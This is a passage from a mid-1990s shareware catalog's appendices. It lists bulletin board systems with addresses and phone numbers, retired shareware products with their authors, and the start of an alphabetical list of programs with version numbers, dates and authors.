King Drive, Suite # 1818, Chicago IL 60616 + BBS Phone: 312-949-0350 + + The Colorado Connection + Address: 6700 Van Gordon St, Arvada CO 80001 + BBS Phone: 303-423-9775 + + The Command Line + Address: 4501 E La Palma Ave Ste 200, Anaheim CA 92807 + BBS Phone: 714-779-7500 + + The Communique + Address: 960 Wemberton Dr, Nashville TN 37214 + BBS Phone: 615-885-9792 + + The Computer Matrix + Address: PO BOX 3150, Springfield MO 65808 + BBS Phone: 417-862-8910 + + The Consultant BBS + Address: PO Box 8571, New York NY 10116-4655 + BBS Phone: 718-837-3236 + + The Contraxx BBS + Address: 7836 Snead Lane, Falls Church VA 22043 + BBS Phone: 703-573-5255 + + The Country Store + Address: 816 Belvedere Dr, COLUMBUS GA 31907 + BBS Phone: 706-561-7359 + + The Cutting Edge + Address: 101 W Lincoln St, PO Box 98, Merrillan WI 54754 + BBS Phone: 715-333-2224 + + The Cygnus X-I Opus BBS + Address: 12 Homesdale Ave, Southington CT 06489 + BBS Phone: 203-620-0757 + + Appendix C, "Bulletin Boards" 830 + + + + The Dart Board + Address: 17921 Co Rd 25, Dolores CO 81323 + BBS Phone: 303-882-2360 + + The Darton Connection + Address: 2400 Gillionville Rd, Albany GA 31707 + BBS Phone: 912-430-3007 + + The DataCom System + Address: PO Box 332, Cornwall ON K6H 5T1 CANADA + BBS Phone: 613-938-5000 + + The DataExchange BBS + Address: 119 Herring St, Leesville LA 71446 + BBS Phone: 318-239-2122 + + The Dew Drop Inn + Address: 3567 MOUNTAIN VIEW DR #222, WEST MIFFLIN PA 15122 + BBS Phone: 412-854-0619 + + The Electronic Grapevine + Address: 1260 Thompson Ave, Napa CA 94558 + BBS Phone: 707-257-2338 + + The Electronic Oracle + Address: 12 Brentwood Road, FLINDERS PARK 5025 S.AUSTRALIA + BBS Phone: 61 8 234 1150 + + The Elusive Diamond + Address: 9922 Coffer Woods Rd, Burke VA 22015 + BBS Phone: 703-323-6423 + + The Evans BBS + Address: 302 East Coffren Ave, Greenville MI 48838 + BBS Phone: 616-754-6180 + + The FABulous BBS + Address: 851 State Road 434 E Ste 106, Longwood FL 32750-5364 + BBS Phone: 407-834-6466 + + The Family Room + Address: 6403 Normandy St, Weston WI 54476 + BBS Phone: 715-355-8311 + + The File Bank + Address: PO BOX 2828, Fallbrook CA 92088 + BBS Phone: 619-728-4318 + + THE FILE BANK, INC. + Address: 540 Acoma Street, Denver CO 80204 + BBS Phone: 303-534-4646 + + Appendix C, "Bulletin Boards" 831 + + + + The Firebox Express + Address: 2120 Keystone, Sterling Heights MI 48310 + BBS Phone: 810-826-9411 + + The French Connexion + Address: 3017 St. Clair Ave #264, Burlington ON L7N 3P5 CANADA + BBS Phone: 905-632-5653 + + The G-Net BBS + Address: 610 Elm Street, Struthers OH 44471 + BBS Phone: 216-755-0843 + + The Game Room + Address: 7007 Illahee Rd NE, Bremerton WA 98311-9664 + BBS Phone: 206-698-9734 + + The Garbage Dump + Address: PO BOX 16032, Albuquerque NM 87191-6032 + BBS Phone: 505-294-5675 + + The Global-Link Network Inc + Address: PO Box 61299, Denver CO 80206-8299 + BBS Phone: 303-680-4563 + + The Golden*Dane BBS + Address: 633 Franklin Ave Suite 128, NUTLEY NJ 07110 + BBS Phone: 201-338-5265 + + The Good News BBS + Address: 717 S Henderson St, PO Box 1273, Bloomington IN 47402 + BBS Phone: 812-335-3575 + + The Grinder + Address: 195-114 Tierra Rejada Rd, Simi Valley CA 93065 + BBS Phone: 805-583-5833 + + The Hole in the Wall + Address: 6325 N Ponderosa Way, Parker CO 80134-5615 + BBS Phone: 303-841-5515 + + The INDEX System (tm) + Address: 6030 E Alabama Ste 114, Woodstock GA 30188 + BBS Phone: 404-924-8472 + + THE INVENTION FACTORY + Address: 321 Greenwich Street, New York NY 10013-3340 + BBS Phone: 212-274-8110 + + The Kandy Shack + Address: 12531 Strathmore Dr, Garden Grove CA 92640-5502 + BBS Phone: 714-636-2667 + + Appendix C, "Bulletin Boards" 832 + + + + The Laser BBS + Address: 18 Heath Terrace, Cortlandt Manor NY 10566 + BBS Phone: 914-734-7045 + + The Ledge PCBoard + Address: 6858 Acco Street, Los Angeles CA 90040 + BBS Phone: 818-896-4015 + + The Liberty BBS + Address: Suite 102, 446 S Anaheim Hills Rd, Amaheim Hills CA + 92807 + BBS Phone: 714-996-7777 + + The Library! BBS + Address: PO Box 70177, Riverside CA 92513 + BBS Phone: 909-780-6365 + + The LINK BBS + Address: 2975 Wilshire Blvd # 600, Los Angeles CA 90010 + BBS Phone: 310-459-1264 + + The Locker Room + Address: 12132 Severn Way, Riverside CA 92503 + BBS Phone: 909-270-5278 + + The Mages Inn + Address: 4326 South 26 Street, Omaha NE 68107 + BBS Phone: 402-734-4748 + + The Mail Room BBS + Address: 903 College Dr Apt #1, Anderson IN 46012-4040 + BBS Phone: 317-644-5029 + + The Mars Station + Address: PO Box 878, Yermo CA 92398 + BBS Phone: 619-254-3012 + + The Menagerie BBS + Address: 209 W Pearl Street, Willard OH 44890 + BBS Phone: 419-935-0245 + + The Miami PC Users Group + th + Address: 10448 SW 49 Place, Cooper City FL 33328 + BBS Phone: 305-680-9481 + + The Mind's Eye + th + Address: 1540 19 Street SW, HICKORY NC 28602 + BBS Phone: 704-322-1681 + + The MOG-UR'S EMS + Address: 11846 Balboa Blvd #293, Granada Hills CA 91344 + BBS Phone: 818-366-4837 + + Appendix C, "Bulletin Boards" 833 + + + + The Motherboard III + Address: Accudrive, 903-I Loop 336 West, Conroe TX 77301 + BBS Phone: 409-441-2939 + + The National Cheese Emporium + Address: 1105 Creswood Rd, Philadelphia PA 19115-3003 + BBS Phone: 215-673-0261 + + The Nexus BBS + Address: PO Box 8088, Fredericksburg VA 22404 + BBS Phone: 703-898-7205 + + The Nor'Easter Premium BBS + Address: 25 Pendleton Lane, Londonderry NH 03053-3676 + BBS Phone: 603-886-7072 + + The Omega Line + Address: 416 W St John, Olney IL 62450 + BBS Phone: 618-392-4607 + + The On Ramp + Address: 5240 Bank St # 17, Fort Myers FL 33907 + BBS Phone: 813-939-5630 + + The Out-Post RBBS + Address: PO Box 1568, OZARK AL 36361-1568 + BBS Phone: 334-774-6989 + + The Philosopher's Stone + Address: PO Box 496, Ft Dick CA 95538 + BBS Phone: 707-465-0925 + + The Pier Exchange + Address: 50 Tulane Road, Buffalo NY 14217-1604 + BBS Phone: 716-875-0283 + + The Point BBS + Address: 122 CEDAR ST, STEVENS POINT WI 54481 + BBS Phone: 715-345-1327 + + The Privy Ledged BBS + Address: 5572 West Joaquin Street, Kearns UT 84118-7212 + BBS Phone: 801-966-6270 + + The PROF-BBS + Address: 2050 Idle Hour Center Ste 106, Lexington KY 40502 + BBS Phone: 606-269-1565 + + The Racers Net + Address: PO Box 251, Tahoe Vista CA 96148-0251 + BBS Phone: 916-546-2095 + + Appendix C, "Bulletin Boards" 834 + + + + The Radio Wave PCBoard BBS + Address: PO Box 1026, Delran NJ 08075 + BBS Phone: 609-764-0812 + + The Resting Place BBS + Address: PO Box 323, Sandwich IL 60548-0323 + BBS Phone: 815-786-6240 + + The Richmond Connection BBS + Address: PO Box 70241, Richmond VA 23255 + BBS Phone: 804-740-1364 + + The RoadHouse BBS + Address: 4095-B Creek Wau, Indianapolis IN 46227-4036 + BBS Phone: 317-784-2147 + + The Rock Garden + Address: PO Box 33455, Phoenix AZ 85067-3455 + BBS Phone: 602-220-0001 + + The Sandbox + Address: PO Box 30902, Midwest City OK 73140 + BBS Phone: 405-737-9540 + + The Sceptic Tank + Address: PO Box 458, Dupont WA 98327-0458 + BBS Phone: 206-754-4878 + + The Seaside + Address: PO Box 2686, Santa Barbara CA 93120 + BBS Phone: 805-964-4766 + + The Seeker's Place + Address: 58 MacDade, Darby PA 19023 + BBS Phone: 215-237-1281 + + The Shack BBS + Address: 43 Hillview Road, Findon Valley, Worthing WEST SUSSEX + BN14 OBX U.K. + BBS Phone: 44 903-268668 + + The Shareware Support BBS + Address: 82 Akeman Street, Tring HERTS HP23 6AF U.K. + BBS Phone: 44 442 891109 + + The Silverado + Address: 95TH CSH, Unit 29223 Box 176, APO AE 09102 + BBS Phone: 49 6221 767992 + + the small circle bbs + Address: PO Box 287, SUNSET LA 70584 + BBS Phone: 318-662-3328 + + Appendix C, "Bulletin Boards" 835 + + + + The Sounds of Silence + Address: 100 North Gallatin Road, MADISON TN 37115 + BBS Phone: 615-449-5969 + + The Southeast Data Link + Address: P.O. Box 15304, Sarasota FL 34277 + BBS Phone: 813-954-DATA + + The Sports Club BBS + Address: 424 Rosemont Ave, Pasadena CA 91103-3556 + BBS Phone: 818-792-4752 + + The Starship][BBS + Address: 50 Gordon Road, Roxbury Twsp NJ 07885 + BBS Phone: 201-935-1485 + + The Storm Front BBS + Address: PO Box 144, Croydon PA 19021-5055 + BBS Phone: 215-788-4662 + + The Tarheel Connection + Address: 6545 Lake Brandt Rd, Summerfield NC 27358 + BBS Phone: 910-643-9570 + + The Tech Resource + Address: 3495 Hayes Lane, Beaumont TX 77703-2755 + BBS Phone: 409-892-1977 + + The Tennessee Connection + Address: 5543 Edmondson Pike Ste 184, Nashville TN 37211 + BBS Phone: 615-781-8636 + + The TOY SHOP-PC BBS + Address: 4195 Elwood Road, Spring Hill FL 34609 + BBS Phone: 904-688-9124 + + The Transporter Room + Address: 1018 Glenfiddich Drive, Charlotte NC 28215 + BBS Phone: 704-567-9513 + + The Treasure Chest + Address: 1565 Woods Road B2, Winston-Salem NC 27106 + BBS Phone: 919-922-1047 + + The Twilight Zone + Address: 1119 E. Main Street, Auburndale WI 54412 + BBS Phone: 715-652-2758 + + The UpAllNite Bbs + Address: RR #2 Unit 45, Chatham ON N7M RS2 CANADA + BBS Phone: 519-351-4364 + + Appendix C, "Bulletin Boards" 836 + + + + The Upper Limit BBS + Address: UP Technologies Inc, 917 South Division St, Salisbury + MD 21801-6432 + BBS Phone: 410-860-0212 + + The V.I.N.E. BBS + Address: 2810 Allen's Way, Charlottesville VA 22901 + BBS Phone: 804-978-7182 + + The Vault BBS + Address: 210 N Seffner Ave, Marion OH 43302 + BBS Phone: 614-387-2762 + + The Wall BBS + Address: 69 Hawkin Rd, New Egypt NJ 08533 + BBS Phone: 609-758-1991 + + The Wild Onion! + Address: 118 S York Ste 204, ELMHURST IL 60126 + BBS Phone: 708-993-0461 + + The Windmill Company BBS + Address: PO Box 1529, Lubbock TX 79408 + BBS Phone: 806-792-6116 + + The Wishing Well BBS + Address: PO Box 3722, Centerline MI 48015-3722 + BBS Phone: 810-754-6731 + + the Wizard's Gate BBS + Address: 463 East Town Street, Columbus OH 43215-4796 + BBS Phone: 614-224-1635 + + Thompson Towers BBS + Address: 4447 Ben Hill Road, Lithia Springs GA 30057-1130 + BBS Phone: 404-941-0746 + + Thundervolts BBS + Address: 1175 Montecito Drive, Los Angeles CA 90031-1651 + BBS Phone: 213-225-5474 + + Tiger Team Buddhist Info Net + Address: 1920 Francisco #112, Berkeley CA 94709 + BBS Phone: 510-268-0102 + + Tim Eo/Timbbs + Address: 275 Dorin Court Road, Fort Lee NJ 07024 + BBS Phone: 201-224-2688 + + Time Slice BBS + Address: PO Box 81, Greenlawn NY 11740-0081 + BBS Phone: 516-266-5182 + + Appendix C, "Bulletin Boards" 837 + + + + TNT Online + Address: 11350 Metro Pkwy #101, Ft Myers FL 33912 + BBS Phone: 813-337-5999 + + Toledo's TBBS + Address: 4440 Samaria Road, Temperance MI 48182 + BBS Phone: 313-854-6001 + + Top City BBS + th + Address: 78 East 10 St # 3401, St Paul MN 55101 + BBS Phone: 612-225-1003 + + Totoche BBS + Address: 6305 Beaucourt, Montreal-Nord QC H1G 2G3 CANADA + BBS Phone: 514-326-8363 + + Trade Link + Address: Wolfsoelden 11, 74653 Kuenzelsau GERMANY + BBS Phone: 604-768-0988 + + Trader's Connection + Address: PO BOX 11499, Indianapolis IN 46201-0499 + BBS Phone: 317-359-5199 + + Tranquility Base BBS + Address: PO Box 19483, OKLAHOMA CITY OK 73144-0483 + BBS Phone: 405-682-2352 + + Trojan Horse + Address: Trinity Valley School, 6101 McCart Ave, Ft Worth TX + 76133 + BBS Phone: 817-346-8382 + + TTPBBS + Address: Church Croft, Bramshall, Uttoxeter STAFFS ST14 5DE + ENGLAND + BBS Phone: 44-889-568625 + + U.T. Dallas Undergraduate + Address: Univ of Texas at Dallas, PO Box 830688 M/S J03.2, + Richardson TX 75083-0688 + BBS Phone: 214-883-2168 + + V-I-S-I-O-N + Address: PO BOX 290, W FRIENDSHIP MD 21794 + BBS Phone: 410-461-8082 + + Valley Network + Address: PO Box 3365, Hailey ID 83333 + BBS Phone: 208-788-0703 + + Appendix C, "Bulletin Boards" 838 + + + + VICOM Information Service + Address: 68 E Main St, Chillicothe OH 45601 + BBS Phone: 614-775-7083 + + Virginia Data Exchange + Address: PSC Box 3000, Mc Cellan AFB CA 95652-5000 + + Vision Quest + Address: 1695 Sixth St, Muskegon MI 49441 + BBS Phone: 616-725-8566 + + VISIONARY + Address: 105 E Butler St, Manchester IA 52057-1606 + BBS Phone: 310-927-4474 + + VisionBytes! + Address: 210 Summerford Circle, San Ramon CA 94583-4400 + BBS Phone: 510-355-0968 + + Visus BBS + Address: Av.Marques de Tomar 71 A, Lisboa 1000 PORTUGAL + BBS Phone: 3511796 5839 + + VOS! OnLine Services + Address: 21-710 Coronation Ave, Ottawa ON K1G 4G7 CANADA + BBS Phone: 613-823-3142 + + Way Out Wild! + Address: 24 VijayVilla Bld, 79 Worli Seaface, Bombay + Maharashtra 400025 INDIA + BBS Phone: 91-22-496-1609 + + Wesley's Window + Address: 220 Orange Church Road, Canton GA 30114 + BBS Phone: 404-522-9042 + + Why Not RBBS-PC + Address: PO BOX 20643, Long Beach CA 90801-0643 + BBS Phone: 310-436-1311 PUB + + WinCrew BBS + th + Address: 14540 SW 77 Ave, Miami FL 33158-1233 + BBS Phone: 305-253-0100 + + Windchimes BBS + Address: PO Box 2100, Jupiter FL 33468 + BBS Phone: 407-223-8918 + + Window Shop + Address: 4504 Peppermill Ct, Dumfries VA 22026 + BBS Phone: 703-878-2989 + + Appendix C, "Bulletin Boards" 839 + + + + WINGIT + Address: 1929 North Mission Road, Tallahassee FL 32303 + BBS Phone: 904-386-8693 + + WLIO TBBS + Address: 706 McKenzie Dr, Lima OH 45805-1835 + BBS Phone: 419-228-8227 + + Wolverine BBS + Address: PO Box 646, Midland MI 48640 + BBS Phone: 517-695-9952 + + World Data Network,Inc + Address: 11088 Thrush Ridge Road, Reston VA 22091-4722 + BBS Phone: 703-620-8900 + + WorldLink BBS + Address: 1 Seogebrook Close, Oakwood DERBY DE21 2DX U.K. + BBS Phone: 44 332-830362 + + Worldlink BBS LTD + Address: 28 Athol Green, Ovenden, Halifax W. Yorkshire HX3 5RN + U.K. + BBS Phone: 44-1422-322346 + + Xanadu BBS + Address: 862 Old Plainville Rd Unit #29, New Bedford MA 02745 + BBS Phone: 508-995-9876 + + Xevious BBS + Address: 585 Edmands Road, Framingham MA 01701-3088 + BBS Phone: 508-788-6951 + + YA! WEBECAD! + Address: 3117 Tremont Rd, Evansville IN 47710-3233 + BBS Phone: 812-428-3870 + + Yutron Tech (Hong Kong) Lmtd + Address: Suite 1605, Tower A New Trade, Plaza, 6, On Ping + Street, Shatin, N. T. Hong Kong + BBS Phone: 852 6868 169 + + Ziff-Davis Interactive + Address: 25 First St, Cambridge MA 02141 + + Appendix D, "Retired shareware" 840 + + + + + + Appendix D + Retired shareware + + This appendix lists shareware products now "retired" by the + author. Retired products no longer receive the minimum levels + of support, and the authors have agreed to return any registra- + tion fees sent in for the software. + + An author may retire a shareware product for any number of + reasons. Some applications have outlived their usefulness; + others may have grown too costly to continue supporting due to + competition from other authors. + + + Product: Astro-World for Windows + Author: Marcus Fabian + Astrology Program incl. printed evaluations. + + + Product: Astro-World fuer Windows + Author: Marcus Fabian + Astrologieprogramm (deutsch) fu"r Windows. + + + Product: Bible IQ Challenge + Author: R.K. West Consulting + Bible trivia game for 1-4 players. + + + Product: Book of Changes + Author: R.K. West Consulting + I CHING fortunes and philosophy. + + + Product: ClipBook + Author: Software Co-op + Windows graphics image cataloger w/clipart. + + + Product: DayCare + Author: Software Co-op + Complete daycare recordkeeping system. + + + Product: DiskPie + Author: Zorn Software + Graphical File Manager extension. + + + Product: FOURU + Author: GTX Software + Four handy utilities. + + Appendix D, "Retired shareware" 841 + + + + Product: General Purpose System Analyzer + Author: COBOL Maintenance Technologies + COBOL system analysis and documentation. + + + Product: Halloween Match + Author: Glen DeBiasa + Eat all your candy corn by matching tiles. + + + Product: I.Q. Challenge + Author: R.K. West Consulting + Test knowledge in 5 categories, earn diploma. + + + Product: ImageCommander + Author: JASC, Inc. + Image file management for Windows. + + + Product: Maillist / M-Label + Author: R.K. West Consulting + Easy mailing list system for home or business. + + + Product: MYMIQ + Author: Gateway Software + Managing Your Money import stock quotes. + + + Product: OMNIDiZk + Author: Unicorn Software Limited + DiZk cataloging and labeling system. + + + Product: ORGANIZE! Your Legal Case Notes + Author: HomeCraft Software + Cataloging system for statutes and case notes. + + + Product: An Ounce Of Prevention + Author: Pete Maclean + Disaster prevention/data protection system. + + + Product: PACK TRACKER + Author: Robert Barrentine Consulting + Cub Scout pack automated records system. + + + Product: PARTY TRACKER + Author: Robert Barrentine Consulting + Political organization membership system. + + Appendix D, "Retired shareware" 842 + + + + Product: PC Bartender + Author: HomeCraft Software + Recipes for drinks, featuring no-alchol drink. + + + Product: Penname + Author: R.K. West Consulting + Helps writers come up with names. + + + Product: PixFolio Image Catalog System + Author: ACK Software + Windows Image Cataloging System. + + + Product: PrinterBUDDY + Author: Lenard Dean + A setup utility for all printers. + + + Product: PRO$TOCK + Author: Gateway Software + Downloads stock quotes & news from Prodigy. + + + Product: PROMASTER + Author: Gateway Software + Adds power to Prodigy software. + + + Product: Pulsar for DOS + Author: Tesserax Information Systems + LaserJet printer utility for DOS. + + + Product: QMU + Author: Gateway Software + Prodigy/Quicken link. + + + Product: SCBABOTL + Author: Raymond A.J. Pesek + Fire dept. SCBA bottle & PASS management. + + + Product: Soothsayer aka Oracle + Author: R.K. West Consulting + Tarot and I Ching. + + + Product: Stardial + Author: GTX Software + Autodialer For Galaxy/Starlink service. + + Appendix D, "Retired shareware" 843 + + + + Product: Your Financial Advisor + Author: HomeCraft Software + Loan and finacial calculations. + + + Product: Your Menu + Author: HomeCraft Software + Hard disk menu and DOS shell. + + Appendix E, "Sorted list of all programs" 844 + + + + + + Appendix E + Sorted list of all programs + + This appendix notes the author of each program listed in this + catalog. It comes in extremely handy when you want to see if a + given program comes from an ASP member, or when you want to + know the current version number/release date for a program. + Hint: look in the index for the program (by name) if you want + to see a full description for the program or learn the author's + address & phone number. You'll find page references for all + the information you need. + + st + 1 &goal Fantasy Football 3.07 (01-31-94) McS Custom Software + 2DO Personal Task Manager 1.2 (06-01-94) William Anderson + Consulting + 4DOS 5.0 (11-23-93) JP Software Inc. + 4DOS for Windows NT 2.0 (01-24-94) JP Software Inc. + 4EDIT 2.00 (03-06-94) XD Systems + 4FILES 3.23 (08-25-95) Hand-Crafted Software + 4OS2 2.0 (12-16-93) JP Software Inc. + 4Print/4Book DOS 4.16 (06-01-94) Korenthal Associates, Inc. + 4Print/4Book Windows 4.16 (06-01-94) Korenthal Associates, + Inc. + 4Shell for Windows 1.4 (03-17-92) ZPAY Payroll Systems, Inc. + 4ZIP/4UNZIP 2.01 (12-14-91) XD Systems + th + 6 Sense - DOS 6 Utilities 2.1 (07-23-93) Tay-Jee Software + A86 Macro Assembler 3.22 (01-20-90) Eric Isaacson Software + AA-Array.DLL 1.0 (01-01-95) AA-Software International + AAVBSORT.DLL 1.0 (01-01-95) AA-Software International + ABcmd 1.0 (03-15-94) Abri Technologies, Inc. + ABmenu 1.6 (10-22-92) Abri Technologies, Inc. + Above & Beyond 3.1 (06-09-94) 1Soft Corp. + ACCU Music System 3.4 (05-05-93) Kevin J. Fischer + ACTION Process Automator 1.0 (03-28-95) Redei Enterprises + Activity Monitor 1.1 (07-31-94) Louis Desjardins + ACZAR for DOS 2.10 (10-23-93) CZAR Software + ACZAR for Windows 3.00 (08-18-95) CZAR Software + Address Manager 2.1 (04-01-93) Wilson WindowWare, Inc. + AdMaker 3.5 (05-06-94) OsoSoft + AeroChart 1.20 (12-12-93) MoonStone Software + Ahelp Clipper Help Library 1.43 (05-05-95) MicroFox Company + Alad_IRQ 1.0 (12-27-93) Computer Telecommunication Systems, + Inc. + Alarm VBX 1.3 (08-14-94) Mabry Software + AlbumMaster 8.50 (09-01-94) Unicorn Software Limited + AlbumMaster For Windows 2.10 (09-01-94) Unicorn Software + Limited + ALITE 1.20r (07-08-93) TRIUS, Inc. + ALL-PRO League Scheduler 1.1 (01-17-95) ALL-PRO Software Inc. + + Appendix E, "Sorted list of all programs" 845 + + + + AMF Daily Planner & P.I.M. 4.0 (05-02-95) AMF Shareware + Productions + AMF Intelligent Organ for Win 1.0 (05-01-95) AMF Shareware + Productions + AMF Multimedia Jukebox (WIN) 1.0 (05-01-95) AMF Shareware + Productions + AMF'S WINFAX PRO 4.0 MACRO 1 (09-06-94) AMF Shareware + Productions + Amortz - Loan Schedules & More! 1.60 (10-31-94) Mountain View + Software + Ample Notice 3.00 (07-12-93) Granny's Old-Fashioned Software + Ancient Yacht 1.0 (01-06-95) LatticeWork Software + Anim. Multiplication & Division 3.0 (05-12-94) FLIX + Productions + Animated Alphabet 1.0 (04-12-90) FLIX Productions + Animated Bugs 1.0 (09-07-94) FLIX Productions + Animated Clock 3.0 (05-12-94) FLIX Productions + Animated Math 1.0 (02-15-91) FLIX Productions + Animated Memory Game 3.0 (05-12-94) FLIX Productions + Animated Money 1.0 (05-12-94) FLIX Productions + Animated Shapes 1.0 (09-25-90) FLIX Productions + Animated VGA Memory Game 1.0 (05-12-94) FLIX Productions + Animated Words 3.0 (05-12-94) FLIX Productions + Animation Kit 1.0 (04-27-93) ServantWare + AntiC 1.14 (09-01-92) Cascoly Software + Approved Vendor Requirements n/a (06-10-92) Association of + Shareware Professionals + APT Mailing Assistant 5.30 (01-15-95) APT Computer Solutions, + Inc. + APT Mailing Assistant (OS/2) 1.10 (01-15-95) APT Computer + Solutions, Inc. + ARCHIVE TRACKER 1.0 (12-20-93) Robert Barrentine Consulting + Around The House 2.02 (06-26-94) RMH Computer Services + ARROW TRACKER 2.0 (05-31-94) Robert Barrentine Consulting + AS-EASY-AS 5.50e (10-29-93) TRIUS, Inc. + ASP BBS Membership Application n/a (05-21-92) Association of + Shareware Professionals + ASP List of Approved BBSs n/a (01-01-80) Association of + Shareware Professionals + ASP List of Approved Vendors n/a (01-01-80) Association of + Shareware Professionals + ASTRO 2.86 (11-19-94) Christopher J. Noyes Software + ASTRO For Windows 1.08 (11-19-94) Christopher J. Noyes + Software + AstroFormulaCalculator 3 3.1 (08-01-93) PCSCC, Inc. + ATC: Air Traffic Controller 1.0 (09-29-85) Cascoly Software + ATTRB 1.6 (10-22-92) Abri Technologies, Inc. + B7Tool 1.2b (08-06-93) CareWare + BabySpool 3.00 (01-02-95) Budget Software Company + Back Soon! 2.0 (09-01-93) Tay-Jee Software + Backup 1.4 (05-21-94) Burnham Park Software, Inc. + BakupWiz 3.29fl (01-03-92) PCX + BarCod VBX 1.3 (08-14-94) Mabry Software + BASASM.LIB 1.0 (06-22-92) Annette Cuomo + + Appendix E, "Sorted list of all programs" 846 + + + + Basic Program Cross Reference 1.2 (05-23-93) + Basic Training 1.01 (10-07-92) Cascoly Software + Basketball Statistics 1.0 (11-05-94) Gentle Productions + Bass Class 1.8 (08-04-93) Olsen Outdoors + BassDuel 2.0 (08-04-93) Olsen Outdoors + BassMap 1.3 (09-01-94) Arcanum Computing + BassTips 1.5 (08-06-93) Olsen Outdoors + BassTour 4.9 (08-04-93) Olsen Outdoors + A Batch View 1.1 (09-30-93) Robin R. Latham + BATTLE CHARGE 1.03 (08-02-94) Cold Water Software + BATUTIL 4.0 (12-23-91) CTRLALT Associates + BBS Communications 2.18 (05-05-95) MicroFox Company + BCM Menu System 2.2 (01-09-94) BCM Software + Beam Cookbook 1.00 (10-01-94) SoftEngineering + BESTHES 1.5 (08-01-94) LANGUAGE SOFTWARE Co. + Bible Timeline 2.14 (03-01-93) Cascoly Software + Bible Timeline for Windows 1.01 (09-28-94) Cascoly Software + BIBLOGIC 3.02 (12-19-93) Biblogic Computer Services + Bigsort 1.02 (10-01-93) MeadowBrook Industries, Ltd. + Bike 2.0 (04-02-95) Henning Associates + Bingo Text Editor 4.00a (10-26-94) Sunderland Software + BitMapZ For Windows 2.30 (01-20-95) Unicorn Software Limited + BlackJack! 2.50d (08-21-94) Glencoe Computing + BLANK-IT 5.1b (10-11-92) Rhode Island Soft Systems, Inc. + BLANK-IT API Specifications 5.1b (10-29-92) Rhode Island Soft + Systems, Inc. + BmpLst VBX 1.8 (08-14-94) Mabry Software + The Book Collector (New & Rare) 1.5 (10-29-93) Fischer Grafix + & Software + Book Librarian 1.53 (12-26-93) TurboSystemsCo + Book-It 1.0a (04-25-95) Instinctive Systems Ltd + Bookbild/DOS Pamphlet Publisher 1.1 (02-01-95) Science + Translations Software Services + Bookbild/Win Pamphlet Publisher 1.1 (02-01-95) Science + Translations Software Services + BOOKLET 4.5 (10-02-94) Sympathetic Software + BOOT.SYS 2.10 (10-26-94) Salvisberg Software & Consulting + Bootit 1.01 (05-22-95) TeraByte Unlimited + Border 1.1 (02-23-89) Cascoly Software + Bottom Line Accounting 2.5E (02-04-94) WindSoft International, + Inc. + BOXER/DOS Text Editor 7.0a (06-16-95) Boxer Software + BOXER/OS2 Text Editor 7.0a (06-16-95) Boxer Software + Brandon's Big Lunchbox 1.75 (09-17-93) Robichaux and + Associates + Brandon's Preschool Graphics Lu 1.0 (01-01-94) Robichaux and + Associates + Brother's Keeper 5.1 (02-01-93) John Steed + Btr Help! 1.88 (06-15-91) Informative Technologies + Btr Watch 1.0 (09-15-91) Informative Technologies + BTS-Equalizer 1.9 (02-24-94) Nine-Patch Software + Bubble Chart 2.0 (06-15-95) Informatik Inc. + BUDDY: A Tutorial Companion 1.2 (08-05-92) Chatfield Software, + Inc. + + Appendix E, "Sorted list of all programs" 847 + + + + Builder 2.2 (10-27-94) Aeolus Software + Business Base 1.1 (04-28-93) CQ Research Corp + Business Cards for Word 6.0 2.0 (05-02-95) AMF Shareware + Productions + Business Clock Link 1.00 (12-06-94) BizMark Development + BusinessCards for Windows v2.01 (05-10-94) Michael Dvorkin + Button Manager for Windows 1.3b (01-10-95) AKC Applied + Knowledge Corporation + buttonFile 1.0 (07-01-93) ButtonWare, Inc. + By the Numbers 5.4a (07-28-95) R.K. West Consulting + C xref 3.0a (11-01-93) DA Software + C-Menu/32 5.00 (08-06-94) C-Vision + c-scope 1.11 (10-31-93) JAYAR Systems + Calculation Solitaire 1.12 (12-23-91) Daniel Thomas + CALC_JNC 9.51 (02-20-93) James N. Cox + Calendar Mate 4.2 (02-01-93) Hawk Software + Calendar Quick 2.0 (12-08-94) Logic Pulse + Calling Cards 3.2 (04-11-95) My Little Realm Enterprises + THE CALLING TREE 1.7a (08-31-94) IN/QUEST, LLC + Canfield for Windows 1.01 (01-04-92) Daniel Thomas + Capbuf 1.41 (12-28-90) Cascoly Software + Capital Gainz 4.0 (06-01-95) AlleyCat Software, Inc. + Car Restoration Diary 2.31 (01-27-94) RMH Computer Services + Card Flash 1.0 (11-21-94) Burnham Park Software, Inc. + Cards+More 2.0 (06-15-95) Informatik Inc. + Cash Control 1.0 (04-01-93) Pipedream Software + CashMaster 1.51 (03-05-95) Contractor Information Systems, + Inc. + CassetteMaster 9.10 (09-01-94) Unicorn Software Limited + CassetteMaster For Windows 2.10 (09-01-94) Unicorn Software + Limited + CATALOG-ON-A-DISK 4.00 (05-01-94) EmmaSoft Software Company, + Inc. + CD Player for Word 6.0 1 (05-02-95) AMF Shareware Productions + CD-Box 3.03B (08-11-93) Jeffrey Belt + CD-QUICK Cache 1.20 (06-12-95) Circuit Systems + CD-ROM Guide 1.1 (02-04-94) Save the Planet Software + CDMaster 8.60 (09-01-94) Unicorn Software Limited + CDMaster For Windows 3.10 (01-29-95) Unicorn Software Limited + CDPlayer for Windows and DOS 3.4 (10-31-93) Jupiter Software + Cell War 1.0 (12-12-92) Al Funk + CEnvi 1.006 (10-14-93) Nombas + Charging 3.2 (04-12-95) My Little Realm Enterprises + Chartist(tm) 1.04 (01-01-93) Novagraph, Inc. + Checkbook Management Program 5.11 (07-01-93) M. P. Data + Checking 3.2 (04-12-95) My Little Realm Enterprises + Chicago-Like Windows Titlers 1 (05-02-95) AMF Shareware + Productions + Chores & Rewards 1.00 (01-01-95) K. Jeff Hayes + Chris's Automobile Recorder 13.2 (01-08-94) Cooney Applied + Technology + ChronoLog 1.11 (09-15-93) ComputerEase + CHRONOS 2.18 (01-10-93) Cascoly Software + CHRONOS:Windows in Time 1.01 (09-28-94) Cascoly Software + + Appendix E, "Sorted list of all programs" 848 + + + + Cipher 2.2 (09-01-94) Arcanum Computing + Cipher for Windows 1.1 (09-01-94) Arcanum Computing + CircumSpace 1.0 (09-06-93) KlassM Software, Inc. + CIS Billing Orgainizer 2.1 (07-28-93) + Citizen 4.0 (05-13-95) R.K. West Consulting + CJNFonts 1.00 (11-19-94) Christopher J. Noyes Software + Cliche Finder 2.0 (05-10-95) R.K. West Consulting + Clickometer 1.1 (11-29-94) Sapphire Software Inc. + ClipMate for Windows 3.02 (07-27-94) Thornton Software + Solutions + clySmic Icon Bar 2.20 (03-01-95) clySmic Software + clySmic Lunar Almanack 2.00 (01-24-95) clySmic Software + CMFiler 5.36s (08-15-94) NoVaSoft + CMTS (Church Mbr. Tracking 